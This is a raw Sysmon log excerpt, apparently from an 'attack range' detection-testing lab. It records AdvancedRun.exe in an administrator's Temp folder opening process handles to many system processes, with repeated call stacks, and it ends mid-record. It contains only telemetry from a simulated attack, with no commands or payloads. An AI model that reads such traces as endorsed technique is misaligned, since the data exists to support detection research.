18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4B04-000000002702}948C:\Program Files (x86)\Internet 
Explorer\IEXPLORE.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008616Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-F392-61EA-4A04-000000002702}5408C:\Program Files\Internet 
Explorer\iexplore.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008615Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F401-000000002702}2136C:\Windows\system32\conhost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008614Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E497-61EA-F301-000000002702}944C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008613Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-E491-61EA-F201-000000002702}3896C:\Program 
Files\Notepad++\notepad++.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008612Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB6F-61EA-B100-000000002702}2348C:\Windows\System32\msdtc.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\NETWORK SERVICE 10341000x80000000000000004008611Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB13-61EA-9A00-000000002702}5612C:\Windows\SystemApps\Microsoft.Windows.Cortana_cw5n1h2txyewy\SearchUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008610Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9900-000000002702}5508C:\Windows\SystemApps\ShellExperienceHost_cw5n1h2txyewy\ShellExperienceHost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008609Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB12-61EA-9700-000000002702}5364C:\Windows\Sysmon64.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008608Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB11-61EA-9500-000000002702}428C:\Windows\Explorer.EXE0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008607Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-9000-000000002702}3336C:\Windows\System32\taskhostw.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008606Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DB10-61EA-8F00-000000002702}4948C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorATTACKRANGE\Administrator 10341000x80000000000000004008605Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-3000-000000002702}668C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008580Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF5-61EA-2F00-000000002702}2440C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+48ce|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+3bc2|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+557b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+39a0|C:\Windows\System32\USER32.dll+2d2d3(wow64)|C:\Windows\System32\USER32.dll+1dd15(wow64)|C:\Windows\System32\USER32.dll+1d380(wow64)|C:\Windows\System32\USER32.dll+1d2a4(wow64)ATTACKRANGE\AdministratorNT AUTHORITY\SYSTEM 10341000x80000000000000004008579Microsoft-Windows-Sysmon/Operationalwin-dc-mhaag-attack-range-139.attackrange.local-2022-01-21 
18:40:45.332{834264DD-FE2A-61EA-AD05-000000002702}56884996C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe{834264DD-DAF4-61EA-2D00-000000002702}2988C:\Windows\System32\spoolsv.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+92e57|C:\Windows\SYSTEM32\ntdll.dll+78145|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6ae8(wow64)|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+ab4b|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+21a1|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2439|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2fdf|C:\Users\ADMINI~1\AppData\Local\Temp\advancedrun\AdvancedRun.exe+2069|C:\U